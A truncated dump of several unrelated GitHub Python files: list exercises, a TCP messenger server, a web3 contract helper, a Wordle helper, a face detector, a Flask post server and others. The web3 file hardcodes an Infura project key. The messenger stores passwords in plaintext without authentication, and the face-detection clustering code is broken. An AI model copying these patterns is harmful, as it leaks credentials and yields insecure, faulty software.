result","repo_name":"erezrubinstein/aa","sub_path":"tests/integration_tests/core_tests/service_tests/implementation/wfs_cleanup_tasks_test_collection.py","file_name":"wfs_cleanup_tasks_test_collection.py","file_ext":"py","file_size_in_byte":9570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35536954058","text":"import statistics\nlista_op1 = list()\nlista_op2 = []\n\nlista_itens = ['eu', 'tu', 'ele', 'nós' 'vós', 'eles']\n\nprint(len(lista_itens))\n\nprimeiro_item = lista_itens[0]\nmeio_item = lista_itens[len(lista_itens)//2]\nultimo_item = lista_itens[-1]\n\nlista_variada = ['Naelson', '20', 1.80, 'Solteiro', 'RN']\n\ncompanhias = ['Facebook', 'Google', 'Microsoft', 'Apple', 'IBM', 'Oracle', 'Amazon']\n\nprint(companhias)\n\nprint(len(companhias))\n\nprimeiro_item = companhias[0]\nmeio_item = companhias[len(companhias)//2]\nultimo_item = companhias[-1]\n\nprint(primeiro_item)\nprint(meio_item)\nprint(ultimo_item)\n\ncompanhias[0] = 'Udemy'\nprint(companhias)\n\ncompanhias.append('Cisco')\n\ncompanhias.insert(len(companhias)//2, 'SpaceX')\n\ncompanhias[0] = 'UDEMY'\n\ncompanhias.remove('IBM')\n\nlista = '#; '.join(companhias)\n\nprint('Oracle' in companhias)\n\ncompanhias.sort()\n\ncompanhias.sort(reverse=True)\n\ncorte_primeiras = companhias[0:3]\n\ncorte_ultimas = companhias[-3:]\n\ndivisao_1 = companhias[0: len(companhias)//2]\ndivisao_2 = companhias[-len(companhias)//2: ]\n\ndel companhias[0]\n\ndel companhias[(len(companhias)//2)]\n\ncompanhias.pop()\n\ncompanhias.clear()\n\ndel companhias\n\nfront_end = ['HTML', 'CSS', 'JS', 'React', 'Redux']\nback_end = ['Node','Express', 'MongoDB']\nfront_end.extend(back_end)\n\nfull_stack = front_end.copy()\n\nfull_stack.insert(5, 'Python')\nfull_stack.insert(6, 'SQL')\n\nidades = [19, 22, 19, 24, 20, 25, 26, 24, 25, 24]\n\nidades.sort()\n\nidades.append(idades[0])\nidades.sort()\nidades.append(idades[-1])\n\nmediana = statistics.median(idades)\n\nmedia = sum(idades)/len(idades)\n\nintervalo_maxmin = abs(idades[0] - idades[-1])\n\nprint(abs(idades[0]-media), abs(idades[-1]-media))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"devSirNaelC7/30-dias-de-python","sub_path":"05°_Dia_Listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11167802835","text":"#####################################################################\r\n# Messenger Application Server.py\r\n# Written By: Lauren Shirley, Steve Smith\r\n# Date: 4/21/2016\r\n# Description: Receives messages from a client and either\r\n# registers, logs in, adds friends, updates chatlog,\r\n# retrieves friend list and chatlog, and logs off users.\r\n# All requests/response must follow their respective\r\n# format listed below:\r\n#\r\n# Registration request \r\n# REGISTER \\t USERID \\t PASSWORD \\t EMAIL \\t FULL NAME\r\n# Registration response \r\n# REGISTRATION_STATUS \\t DETAILS ON STATUS\r\n# Login request\r\n# LOGIN \\t USERID \\t PASSWORD\r\n# Login response\r\n# LOGIN_STATUS \\t STATUS\r\n# Add Friend request\r\n# ADD_FRIEND \\t USERID \\t FRIEND_ID \r\n# Add Friend response\r\n# ADD_FRIEND_STATUS \\t STATUS\r\n# Send Message request\r\n# SEND_MESSAGE \\t FRIEND_ID \\t USERID \\t MESSAGE\r\n# Send Message response\r\n# SEND_MESSAGE_STATUS \\t STATUS\r\n# Chatlog request\r\n# REQUEST_CHATLOG \\t FRIEND_ID \\t USERID\r\n# Chatlog response\r\n# CHATLOG_STATUS \\t STATUS \\t MESSAGES (or FRIEND_ID \\t USERID)\r\n# Get Friends request\r\n# GET_FRIENDS \\t USERID\r\n# Get Friends response\r\n# GET_FRIENDS_RESULTS \\t FRIEND_LIST\r\n# Logoff request\r\n# LOGOFF \\t USERID\r\n# Logoff response\r\n# LOGOFF_STATUS \\t STATUS\r\n#####################################################################\r\n\r\nfrom socket import *\r\nfrom datetime import datetime\r\n\r\n#Create a welcome socket bound at serverPort\r\nserverPort = 12009\r\nserverSocket = socket(AF_INET,SOCK_STREAM)\r\n#serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserverSocket.bind(('',serverPort))\r\nserverSocket.listen(10)\r\nprint ('The Messenger Application server is ready to receive')\r\naccessTime = datetime.now();\r\nprint(\"Access time is\", accessTime);\r\n\r\nwhile 1:\r\n connectionSocket, addr = serverSocket.accept()\r\n #Wait for the hello message\r\n while 1:\r\n request = connectionSocket.recv(1024).decode('ascii')\r\n print(\"Request message:\", request)\r\n #if request message is blank then break out and close socket\r\n if(request == \"\"):\r\n break\r\n\r\n #save method name to check for type of request\r\n methodName = request.split('\\t')[0].strip()\r\n #print received from information\r\n print(\"From\", addr,methodName)\r\n\r\n #receive hello message and return \r\n if(methodName.upper() == \"HELLO\"):\r\n Request = \"Connection successful!\"\r\n connectionSocket.send(Request.encode())\r\n \r\n #Registration Processing\r\n elif(methodName.upper() == \"REGISTER\"):\r\n #assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n password = request.split('\\t')[2].strip()\r\n userFullName = request.split('\\t')[3].strip()\r\n email = request.split('\\t')[4].strip()\r\n RegisterStatus = \"Registration_Status \\tSuccess\\r\\n\"\r\n #check file for existing records\r\n for line in open(\"UserProfile.txt\"):\r\n registeredID = line.split('\\t')[0].strip()\r\n registeredEmail = line.split('\\t')[2].strip()\r\n if(userID==registeredID): #if user name already exists\r\n RegisterStatus = \"Registration_Status \\tUsername already exists. Please try again\\r\\n\"\r\n elif(email==registeredEmail): #if email is registered under a different user name\r\n RegisterStatus = \"Registration_Status \\tRegistration already exists with this email. Please try again\\r\\n\"\r\n if(RegisterStatus != \"Registration_Status \\tSuccess\\r\\n\"):#if user info match any in file send back error\r\n connectionSocket.send(RegisterStatus.encode())\r\n else: #if username does not exist and email not already used\r\n if(len(password) < 6): #make sure password is at least 6 characters\r\n passwordError = \"Registration_Status \\tPassword must be at least 6 characters. Please try again\\r\\n\"\r\n connectionSocket.send(passwordError.encode()) #return error\r\n else: #else registration successful, save record and report back to user\r\n #create record to save\r\n NewUserRecord = userID + '\\t' + password + '\\t' + email + '\\t' + userFullName + '\\t' + str(addr) + '\\n'\r\n #append it to the file\r\n register_file = open(\"UserProfile.txt\", \"a\")\r\n register_file.write(NewUserRecord)\r\n register_file.close()\r\n #make entry in status file\r\n status_file = open(\"UserStatus.txt\", \"a\")\r\n status_file.write(userID + '\\t' + 'OFFLINE' + '\\n')\r\n status_file.close()\r\n connectionSocket.send(RegisterStatus.encode())#return registrationstatus\r\n \r\n #Login Processing \r\n elif(methodName.upper() == \"LOGIN\"):\r\n #Assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n password = request.split('\\t')[2].strip()\r\n LoginStatus = \"Login_Status \\tFail\\r\\n\"\r\n #check file for correct user information\r\n for line in open(\"UserProfile.txt\"):\r\n registeredID = line.split('\\t')[0].strip()\r\n registeredPassword = line.split('\\t')[1].strip()\r\n if(userID == registeredID and password == registeredPassword):\r\n LoginStatus = \"Login_Status \\tSuccess\\r\\n\"\r\n \r\n #Change status to online\r\n status_file = open(\"UserStatus.txt\", \"r\")\r\n lines = status_file.readlines()\r\n status_file.close()\r\n \r\n status_file = open(\"UserStatus.txt\", \"w\")\r\n for line in lines:\r\n if(line.split('\\t')[0].strip() != userID):\r\n status_file.write(line.rstrip('\\n') + '\\n')\r\n status_file.write(userID + '\\t' + 'ONLINE' + '\\n')\r\n status_file.close()\r\n connectionSocket.send(LoginStatus.encode()) #return loginStatus\r\n \r\n #Add Friend Processing \r\n elif(methodName.upper() == \"ADD_FRIEND\"):\r\n #Assign each part of message to a variable\r\n userName = request.split('\\t')[1].strip()\r\n friendName = request.split('\\t')[2].strip()\r\n friendExists = False\r\n alreadyFriend = False\r\n message = \"\"\r\n #check file for friends username\r\n for line in open(\"UserProfile.txt\"):\r\n tempUser = line.split('\\t')[0].strip()\r\n if(tempUser == friendName):\r\n friendExists = True #friend exists\r\n #check file to see if user is already a friend\r\n for line in open(\"UserFriends.txt\"):\r\n tempUser = line.split('\\t')[0].strip()\r\n if(tempUser == userName):\r\n friend = line.split('\\t')[1].strip()\r\n if(friend == friendName):\r\n alreadyFriend = True #user is already friends with this person\r\n message = \"User is already a friend!\"\r\n if(friendExists == True):\r\n if(alreadyFriend == False):\r\n #add friend\r\n #append it to the file\r\n friends_file = open(\"UserFriends.txt\", \"a\")\r\n friends_file.write(userName + '\\t' + friendName + '\\n')\r\n friends_file.close()\r\n message = \"Success\"\r\n else:\r\n message = \"User does not exist!\"\r\n #send back add friend status\r\n message = \"Add_Friend_Status\" + \"\\t\" + message + \"\\r\\n\"\r\n connectionSocket.send(message.encode())\r\n \r\n #Send Message Processing \r\n elif(methodName.upper() == \"SEND_MESSAGE\"):\r\n #Assign each part of message to a variable\r\n friendID = request.split('\\t')[1].strip()\r\n userID = request.split('\\t')[2].strip()\r\n message = request.split('\\t')[3].strip()\r\n messageStatus = \"Fail\" #initialize as fail \r\n messageFile = open(\"UserChatlog.txt\", \"r\")\r\n #assign lines in file to a variable\r\n lines = messageFile.readlines()\r\n messageFile.close()\r\n #open file to write\r\n messageFile = open(\"UserChatlog.txt\", \"w\")\r\n for line in lines:\r\n line = line.rstrip('\\n')\r\n userID1 = line.split('\\t')[0].strip()\r\n userID2 = line.split('\\t')[1].strip()\r\n #if user ids match conversation then add message to current line and change status\r\n if((userID1.upper() == userID.upper() and userID2.upper() == friendID.upper())\r\n or (userID1.upper() == friendID.upper() and userID2.upper() == userID.upper())):\r\n messageFile.write(line + '\\t' + message + '\\n')\r\n messageStatus = \"Success\" \r\n messageFile.close()\r\n #if status is still at fail it means a conversation hasn't been started so append to end of file\r\n if(messageStatus != \"Success\"):\r\n messageFile = open(\"UserChatlog.txt\", \"a\")\r\n messageFile.write(userID + '\\t' + friendID + '\\t' + message + '\\n')\r\n messageFile.close()\r\n messageStatus = \"Success\"\r\n #send back Message status\r\n messageStatus = \"Send_Message_Status \\t\" + messageStatus +'\\r\\n'\r\n connectionSocket.send(messageStatus.encode())\r\n \r\n #Request Chatlog Processing \r\n elif(methodName.upper() == \"REQUEST_CHATLOG\"):\r\n friendID = request.split('\\t')[1].strip()\r\n userID = request.split('\\t')[2].strip()\r\n chatlog_status = \"Fail\" #initialize as fail\r\n for line in open(\"UserChatlog.txt\", \"r\"):\r\n line = line.rstrip('\\n')\r\n userID1 = line.split('\\t')[0].strip()\r\n userID2 = line.split('\\t')[1].strip()\r\n #if user ids match conversation then save message to send\r\n if((userID1.upper() == userID.upper() and userID2.upper() == friendID.upper())\r\n or (userID1.upper() == friendID.upper() and userID2.upper() == userID.upper())):\r\n message = line\r\n chatlog_status = \"Success\" #if found then change to success\r\n #return status and ids and message if found\r\n if(chatlog_status == \"Success\"):\r\n chatlogStatus = \"Chatlog_Status \\t\" + chatlog_status + \"\\t\" + line\r\n else:\r\n chatlogStatus = \"Chatlog_Status \\t\" + chatlog_status + \"\\t\" + friendID + \"\\t\" + userID + \"\\t\" + \"\" + \"\\r\\n\"\r\n connectionSocket.send(chatlogStatus.encode())\r\n \r\n #Get Friends Processing \r\n elif(methodName.upper() == \"GET_FRIENDS\"):\r\n #assign user's ID to variable to help locate friend list\r\n userID = request.split('\\t')[1].strip()\r\n friends = \"\"\r\n #search each line for user ID match and save friends if match found\r\n for line in open(\"UserFriends.txt\"):\r\n line = line.rstrip('\\n')\r\n tempID = line.split('\\t')[0].strip()\r\n friendID = line.split('\\t')[1].strip()\r\n if(userID == tempID):\r\n for line in open(\"UserStatus.txt\"):\r\n tempFID = line.split('\\t')[0].strip()\r\n tempFStatus = line.split('\\t')[1].strip()\r\n if(friendID == tempFID):\r\n friends += friendID + \"\\t\" + tempFStatus + \"\\t\"\r\n #send back results\r\n message = 'GET_FRIENDS_RESULTS' + '\\t' + friends +\"\\r\\n\"\r\n connectionSocket.send(message.encode())\r\n\r\n #Logoff Processing \r\n elif(methodName.upper() == \"LOGOFF\"):\r\n #Assign each part of message to a variable\r\n userID = request.split('\\t')[1].strip()\r\n \r\n #Change status to offline\r\n status_file = open(\"UserStatus.txt\", \"r\")\r\n lines = status_file.readlines()\r\n status_file.close()\r\n \r\n status_file = open(\"UserStatus.txt\", \"w\")\r\n for line in lines:\r\n if(line.split('\\t')[0].strip() != userID):\r\n status_file.write(line.rstrip('\\n') + '\\n')\r\n status_file.write(userID + '\\t' + 'OFFLINE' + '\\n')\r\n status_file.close()\r\n \r\n LogoffStatus = \"Logoff_Status \\tSuccess\\r\\n\"\r\n connectionSocket.send(LogoffStatus.encode())\r\n #close connectionSocket \r\n connectionSocket.close()\r\n\r\n","repo_name":"shirleyla10/MessengerApp","sub_path":"Messenger Application Server.py","file_name":"Messenger Application Server.py","file_ext":"py","file_size_in_byte":13028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7729226947","text":"import openpyxl\r\n\r\ndef read_excel_to_dict(file_path):\r\n try:\r\n # Load the Excel workbook\r\n workbook = openpyxl.load_workbook(file_path)\r\n # Select the first sheet (you may need to modify this if your data is in a different sheet)\r\n sheet = workbook.active\r\n # Create a dictionary from the first two columns\r\n result_dict = {}\r\n for row in sheet.iter_rows(min_row=1, max_col=2, values_only=True):\r\n value_list = []\r\n key, value = row\r\n value_list.append(key)\r\n if value == None:\r\n value_list.append('')\r\n else:\r\n value_list.append(value)\r\n result_dict[key] = value_list\r\n return result_dict\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n return None\r\n\r\nexcel_file_path = 'C:/Users/SHHEKO/Downloads/datatest.xlsx'\r\nresult_dictionary = read_excel_to_dict(excel_file_path)\r\n","repo_name":"Ahmed3117/webscapper","sub_path":"readexcel.py","file_name":"readexcel.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7167216133","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ntmax = 10\nn = int(30 * tmax)\ntrials = 10000\n\ndef myplot(average, title, file_name):\n x = np.linspace(0, tmax, n+1)\n plt.figure(figsize = (8,7))\n plt.title(title)\n plt.xlabel('t')\n plt.ylabel('E[N(t)]')\n plt.minorticks_on()\n plt.grid(True, which='major')\n plt.grid(True, which='minor', color='#999999', linestyle = '-', alpha=0.2)\n plt.plot(x, average, drawstyle='steps-post')\n plt.savefig(\"{}.png\".format(file_name))\n # plt.show()\n\ndef estimateENt(interarrivalTime, tmax, n, trials):\n res = np.zeros((n + 1))\n for trial in range(trials):\n current_num = 0\n current_time = 0\n next_interval = interarrivalTime()\n for i in range(n + 1):\n t = i * tmax / n\n if t >= current_time + next_interval:\n current_num = current_num + 1\n current_time = current_time + next_interval\n next_interval = interarrivalTime()\n\n res[i] += current_num\n res = res / trials\n return res\n\n\nmyplot(estimateENt(lambda: 1, tmax, n, trials), 'a) $X_j$ = 1', \"a\")\nmyplot(estimateENt(lambda: 2*np.random.random(), tmax, n, trials), 'b) $X_j$ ~ Uniform(0,2)', \"b\")\nmyplot(estimateENt(lambda: 0.5 + np.random.random(1), tmax, n, trials), 'c) $X_j$ ~ Uniform($\\\\frac{1}{2},\\\\frac{3}{2}$)', \"c\")\nmyplot(estimateENt(lambda: np.random.exponential(1), tmax, n, trials), 'd) $X_j$ ~ Exp($\\lambda$ = 1)', \"d\")\nmyplot(estimateENt(lambda: 1 if np.random.random() < 0.75 else np.random.exponential(1), tmax, n, trials), r'e) $X_j = 1$ w/ prob $\\frac{3}{4}$' \"\\n\" r'~ Exp($\\lambda$ = 1) w/ prob $\\frac{1}{4}$', \"e\")\nmyplot(estimateENt(lambda: 0.5 if np.random.random() < 0.5 else 1.5, tmax, n, trials), r'f) $X_j = \\frac{1}{2}$ w/ prob $\\frac{1}{2}$' \"\\n\" r'= $\\frac{3}{2}$ w/ prob $\\frac{1}{2}$', \"f\")\nmyplot(estimateENt(lambda: 5/6 if np.random.random() < 6/7 else 2, tmax, n, trials), r'g) $X_j = \\frac{5}{6}$ w/ prob $\\frac{6}{7}$' \"\\n\" r'2 w/ prob $\\frac{1}{7}$', \"g\")\nmyplot(estimateENt(lambda: 1/3 if np.random.random() < 0.461263 else np.pi / 2, tmax, n, trials), r'h) $X_j = \\frac{1}{3}$ w/ prob 46.1263%' \"\\n\" r'$\\frac{\\pi}{2}$ w/ prob 53.8737%', \"h\")\n","repo_name":"onedayatatime0923/Stochastic-Processes","sub_path":"hw4/src/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8233316868","text":"from web3 import Web3\n\nclass Contract():\n\n def __init__(self, abi, bytecode, address = None):\n self.w3 = Web3(Web3.WebsocketProvider('wss://ropsten.infura.io/ws/v3/faa6cd8da8984cc7b95b935d1bede5c7'))\n self.abi = abi\n self.bytecode = bytecode\n self.address = address\n self.object = self.w3.eth.contract(abi = self.abi, bytecode = self.bytecode, address = self.address)\n\n def call(self, name, *args):\n return self.object.functions[name](*args).call()\n\n def send_transaction(self, name, addr, private_key, *args, gas_limit = 1000000, gas_price = 3, unit = 'gwei'):\n build = self.object.functions[name](*args).buildTransaction({\n 'from': addr,\n 'nonce': self.w3.eth.getTransactionCount(addr),\n 'gas': gas_limit,\n 'gasPrice': self.w3.toWei(str(gas_price), unit)\n })\n transaction = self.w3.eth.sendRawTransaction(self.w3.eth.account.signTransaction(build, private_key).rawTransaction)\n print(\"Transaction -> https://ropsten.etherscan.io/tx/{}\".format(transaction.hex()))\n self.w3.eth.waitForTransactionReceipt(transaction)\n\n \naddress = '0x348A4b3D65c0663190cda60e2981D5ae377db446'\nprivate_key = bytes.fromhex('')","repo_name":"JyunD/CTF","sub_path":"NCTU2020/crypto/Get_Started/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9304456043","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return the head node in the linked list\n\n def deleteDuplicates(self, A):\n # import pdb\n # pdb.set_trace()\n head = A\n splice = None\n prev = A\n next = prev.next\n\n while next is not None:\n isRepeat = False\n if prev.val == next.val:\n isRepeat = True\n else:\n splice = prev\n\n while next is not None and prev.val == next.val:\n next = next.next\n \n if isRepeat:\n if splice is None:\n splice = next\n else:\n splice.next = next\n\n if isRepeat and head.val == prev.val:\n head = next\n if next is None:\n return head\n prev = next\n next = prev.next\n return head","repo_name":"karandevgan/Algorithms","sub_path":"RemoveDuplicatesLinkedList.py","file_name":"RemoveDuplicatesLinkedList.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39407379800","text":"import csv\r\n\r\nrows = []\r\n\r\nwith open(\"main3.csv\",\"r\") as f:\r\n csvreader = csv.reader(f)\r\n for row in csvreader:\r\n rows.append(row)\r\n\r\n\r\nplanet_data_rows = rows[1:]\r\n\r\nfinal_list = []\r\nfor star_data in planet_data_rows:\r\n temp_list = {\r\n \"star_name\":star_data[1],\r\n \"distance\":star_data[2],\r\n \"mass\":star_data[3],\r\n \"radius\":star_data[4],\r\n \"gravity\":star_data[5]\r\n }\r\n final_list.append(temp_list)\r\n\r\nprint(final_list)\r\n","repo_name":"san994/pro-136","sub_path":"data_create.py","file_name":"data_create.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13998559903","text":"import nltk\nfrom random import random\n\nimport funs\n\n# If you're runnng this you'll need to download the nltk corups of English words\n# run nltk.download() in a python shell beforehand\n\nword_list = [w for w in nltk.corpus.words.words('en') if len(w) == 5 and w.islower()]\nwords = set(word_list)\n\ndone = False\ngoal = [-1, -1, -1, -1, -1]\nans = [' ', ' ', ' ', ' ', ' ']\nconfirmed = {}\nconfirmed_not = []\nrecs = {}\n\ndef checkDone(word):\n for c in word:\n if c == ' ':\n return False\n return True\n\nstarter = word_list[int(random()*len(word_list))]\n\nprint(\"\\n========= GET LIVE WORDLE RECOMMENDATIONS =========\\n\")\nprint(\" We will give you live wordle recommendations\")\nprint(\" all you have to do is come up with a starting\")\nprint(\" word!\")\nprint()\nprint(\" Need a good starting word? Try: %s\" % (starter))\n\nfuns.initRecs()\ntry:\n while not done:\n print(\"---------------------------------------------------\")\n guess = input(\"Please input your guess: \")\n print(\"Please tell us how your word performed:\")\n print(\"0 - not present\\n1 - present, wrong location\\n2 - present, right location\\n\")\n for i in range(5):\n if (ans[i] == ' '):\n goal[i] = int(input(\"%c - \" % (guess[i])))\n else:\n print(\"%c - CONFIRMED\" % ans[i])\n continue\n if goal[i] == 2:\n ans[i] = guess[i]\n if guess[i] in confirmed_not:\n confirmed_not.pop(confirmed_not.index(guess[i]))\n if goal[i] == 1:\n if (guess[i] not in confirmed):\n confirmed[guess[i]] = [i]\n else:\n confirmed[guess[i]].append(i)\n print(confirmed)\n if goal[i] == 0:\n if ((guess[i] not in confirmed_not) and (guess[i] not in confirmed)):\n confirmed_not.append(guess[i])\n if checkDone(ans):\n print(\"Congrats! You're all done\")\n break\n print(\"---------------------------------------------------\")\n print(\"Alright, here's where we're at:\")\n funs.printWord(ans)\n print(\"Here's the other letters we know are in the word\\nsomewhere:\")\n for c in confirmed:\n if c not in ans:\n print(c, end = \" \")\n print(\"\\n---------------------------------------------------\")\n funs.getRecommendations(confirmed)\n funs.printRecs()\nexcept KeyboardInterrupt:\n print(\"\\n\\nThanks for playing! Now shutting down...\\n\")\nfinally:\n exit(0)","repo_name":"benjamnsmith/little-projects","sub_path":"wordle-project/wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31447704767","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#Usage\n#python face_detector.py --input dataset/TestVideo.mp4 --output output/test_output.avi --display 0\n\n\"\"\"\nCreated on Wed Mar 10 11:21:37 2021\n\n@author: ugot\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport argparse\nimport imutils\n\n'''\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n help=\"path to input video\")\nap.add_argument(\"-o\", \"--output\", type=str,\n help=\"path to output video\")\n\nargs = vars(ap.parse_args())\n'''\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n\nprint(\"[INFO] processing video...\")\nstream = cv2.VideoCapture(\"dataset/TestVideo.mp4\")\nwriter = None\nresults = []\nwhile True:\n # grab the next frame\n (grabbed, frame) = stream.read()\n\n # if the frame was not grabbed, then we have reached the\n # end of the stream\n if not grabbed:\n break\n\n # convert the input frame from BGR to RGB then resize it to have\n # a width of 750px (to speedup processing)\n rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n #r = frame.shape[1] / float(rgb.shape[1])\n faces = face_cascade.detectMultiScale(rgb, 1.3, 5)\n i = 0\n for (x,y,w,h) in faces:\n frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n roi = rgb[y:y+h, x:x+w]\n results.append(roi)\n path = 'output/img%d.jpg' % (i,)\n cv2.imwrite(path, roi)\n i += 1\n\nstream.release()\n\n\narray = np.array(results)\n\n# Clustering algorithm\nfrom sklearn.cluster import DBSCAN\nclusters = DBSCAN(eps=3, min_samples=6).fit(array)\nfor i in array:\n img = clusters.predict()\n\n","repo_name":"parallelscore/VUFE-Process","sub_path":"Ogban Ugot/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13557206096","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\"\"\"\ndatabase\n[name, title, description, number], ...]\n\"\"\"\nMEDICAL_STORE = []\nHOUSING_STORE = []\nFOOD_STORE = []\nTRANSPORT_STORE = []\n\n@app.route('/get_medical_info', methods=['GET'])\ndef get_medical_info():\n return \",\".join(titles[1] for titles in MEDICAL_STORE)\n\n@app.route('/get_housing_info', methods=['GET'])\ndef get_housing_info():\n return \",\".join(titles[1] for titles in HOUSING_STORE)\n\n@app.route('/get_food_info', methods=['GET'])\ndef get_food_info():\n return \",\".join(titles[1] for titles in FOOD_STORE)\n\n@app.route('/get_transport_info', methods=['GET'])\ndef get_transport_info():\n return \",\".join(titles[1] for titles in TRANSPORT_STORE)\n\n@app.route('/get_full_medical', methods=['GET'])\ndef get_full_medical():\n position = request.args.get(\"position\")\n print(position)\n return \",\".join(titles for titles in MEDICAL_STORE[int(position)])\n\n@app.route('/get_full_housing', methods=['GET'])\ndef get_full_housing():\n position = request.args.get(\"position\")\n return \",\".join(titles for titles in HOUSING_STORE[int(position)])\n\n@app.route('/get_full_food', methods=['GET'])\ndef get_full_food():\n position = request.args.get(\"position\")\n return \",\".join(titles for titles in FOOD_STORE[int(position)])\n\n@app.route('/get_full_transport', methods=['GET'])\ndef get_full_transport():\n position = request.args.get(\"position\")\n return \",\".join(titles for titles in TRANSPORT_STORE[int(position)])\n\n@app.route('/save_medical_info', methods=['PUT'])\ndef save_medical_info():\n \"\"\"\n request body contains name, title and description\n \"\"\"\n if request.is_json:\n data = request.get_json()\n name = data.get('name')\n title = data.get('title')\n description = data.get('description')\n number = data.get('number')\n\n if name is None or title is None:\n return \"Invalid input\"\n\n MEDICAL_STORE.append([name, title, description, number])\n\n print(MEDICAL_STORE)\n return 'OK'\n else:\n return 'Invalid input'\n\n@app.route('/save_housing_info', methods=['PUT'])\ndef save_housing_info():\n \"\"\"\n request body contains name, title and description\n \"\"\"\n if request.is_json:\n data = request.get_json()\n name = data.get('name')\n title = data.get('title')\n description = data.get('description')\n number = data.get('number')\n\n if name is None or title is None:\n return \"Invalid input\"\n\n HOUSING_STORE.append([name, title, description, number])\n\n print(HOUSING_STORE)\n return 'OK'\n else:\n return 'Invalid input'\n\n@app.route('/save_food_info', methods=['PUT'])\ndef save_food_info():\n \"\"\"\n request body contains name, title and description\n \"\"\"\n if request.is_json:\n data = request.get_json()\n name = data.get('name')\n title = data.get('title')\n description = data.get('description')\n number = data.get('number')\n\n if name is None or title is None:\n return \"Invalid input\"\n\n FOOD_STORE.append([name, title, description, number])\n\n print(FOOD_STORE)\n return 'OK'\n else:\n return 'Invalid input'\n\n@app.route('/save_transport_info', methods=['PUT'])\ndef save_transport_info():\n \"\"\"\n request body contains name, description\n \"\"\"\n if request.is_json:\n data = request.get_json()\n name = data.get('name')\n title = data.get('title')\n description = data.get('description')\n number = data.get('number')\n\n if name is None or title is None:\n return \"Invalid input\"\n\n TRANSPORT_STORE.append([name, title, description, number])\n\n print(TRANSPORT_STORE)\n return 'OK'\n else:\n return 'Invalid input'\n\n@app.route('/delete_info', methods=['PUT'])\ndef delete_info():\n \"\"\"\n request body contains name, service and title\n \"\"\"\n if request.is_json:\n data = request.get_json()\n name = data.get('name')\n title = data.get('title')\n service = data.get('service')\n\n if name is None or title is None or service is None:\n return \"Invalid input\"\n\n if service == \"MEDICAL\":\n for post in MEDICAL_STORE:\n if post[0] == name and post[1] == title:\n MEDICAL_STORE.remove(post)\n print(MEDICAL_STORE)\n elif service == \"HOUSING\":\n for post in HOUSING_STORE:\n if post[0] == name and post[1] == title:\n HOUSING_STORE.remove(post)\n print(HOUSING_STORE)\n elif service == \"FOOD\":\n for post in FOOD_STORE:\n if post[0] == name and post[1] == title:\n FOOD_STORE.remove(post)\n print(FOOD_STORE)\n elif service == \"TRANSPORT\":\n for post in TRANSPORT_STORE:\n if post[0] == name and post[1] == title:\n TRANSPORT_STORE.remove(post)\n print(TRANSPORT_STORE)\n\n return 'OK'\n else:\n return 'Invalid input'\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"yasminmahal/Hack-The-Burgh","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70924900035","text":"## Versao modificada de Bruno Serbena\nfrom PIL import Image\nimport numpy as np\nfrom scipy import ndimage, misc, signal\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib.cm\nimport cv2\nimport math\nimport sys\n\ndef binarize(img, blk_sz=3):\n\timg = img.copy()\n\t#percentileBlack = np.percentile(img, 78)\n\t#percentileWhite = np.percentile(img, 90)\n\tpercentileBlack = np.percentile(img, 78)\n\tpercentileWhite = np.percentile(img, 89)\n\tprint('percentileBlack',percentileBlack)\n\n\tprint('percentileWhite',percentileWhite)\n\n\t#print(percentileWhite)\n\n\t#hist, bins = np.histogram(img, 256, [0, 256])\n\t#plt.hist(img.ravel(), 256, [0, 256])\n\t#plt.title('Histogram for gray scale picture')\n\t#plt.show()\n\tmeans = np.zeros(img.shape)\n\n\t# number of blocks in a dimension\n\tblk_no_y, blk_no_x = (int(img.shape[0]//blk_sz), int(img.shape[1]//blk_sz))\n\tblk_mean = np.zeros((blk_no_y, blk_no_x))\n\t# for each block i,j\n\tfor i in range(blk_no_y):\n\t\tfor j in range(blk_no_x):\n\t\t\tblock = img[blk_sz*i: 